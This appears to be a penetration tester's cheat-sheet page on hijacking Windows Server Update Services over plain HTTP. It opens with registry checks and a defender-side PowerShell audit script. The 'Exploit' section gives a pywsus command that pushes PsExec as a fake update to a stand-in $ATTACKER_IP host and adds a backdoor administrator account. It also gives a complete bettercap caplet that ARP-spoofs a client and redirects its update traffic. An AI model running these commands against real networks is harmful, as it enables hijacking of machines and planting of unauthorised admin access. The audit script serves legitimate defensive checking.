WSUS

Windows Server Update Services

HTTP MitM

Check:

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
      WUServer    REG_SZ    http://wsus.megacorp.local:8530

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
      UseWUServer    REG_DWORD    0x1
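
The same two registry checks, turned into a defender-side audit script. This is an added example, not part of the original notes or any tool they mention; it assumes only the policy keys and values shown above and reports whether the client is pointed at a plain http:// WSUS server, the precondition for the MitM described on this page.

```powershell
# Added audit example (not from the original page): performs the WUServer /
# UseWUServer checks above and flags a plain-HTTP WSUS policy. Assumes only the
# registry paths shown in the notes; run locally or via Invoke-Command on many hosts.
function Test-WsusPolicy {
    [CmdletBinding()]
    param()

    $wuKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $auKey = Join-Path $wuKey 'AU'

    $wuServer    = (Get-ItemProperty -Path $wuKey -Name WUServer    -ErrorAction SilentlyContinue).WUServer
    $useWuServer = (Get-ItemProperty -Path $auKey -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer

    $result = [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        WUServer     = $wuServer
        UseWUServer  = $useWuServer
        Finding      = 'OK'
    }

    if (-not $wuServer -or $useWuServer -ne 1) {
        # No policy server, or the client is not told to use it: updates come
        # from Microsoft Update over HTTPS, so the on-path scenario does not apply.
        $result.Finding = 'WSUS not in use'
        return $result
    }

    $uri = $null
    if (-not [System.Uri]::TryCreate($wuServer, [System.UriKind]::Absolute, [ref]$uri)) {
        $result.Finding = 'WUServer is not a valid URL'
        return $result
    }

    if ($uri.Scheme -eq 'http') {
        # Plain HTTP lets an on-path host between client and WSUS server tamper
        # with update traffic. Fix: publish WSUS over HTTPS and point the GPO at
        # the https:// URL, then re-run this audit to confirm.
        $result.Finding = "HIGH: WSUS over plain HTTP ($($uri.Authority))"
    }

    return $result
}

Test-WsusPolicy | Format-List
```

Fleet-wide, feed the function to Invoke-Command and filter on Finding to list every client still on an http:// WSUS URL.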

Exploit:

$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap

wsus.cap:
# Quick recon of the network
net.probe on

# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
any.proxy on
arp.spoof on
net.sniff on

Local Proxy (LPE)

WSUS + LDAPS NTLM Relay

Tools

SharpWSUS
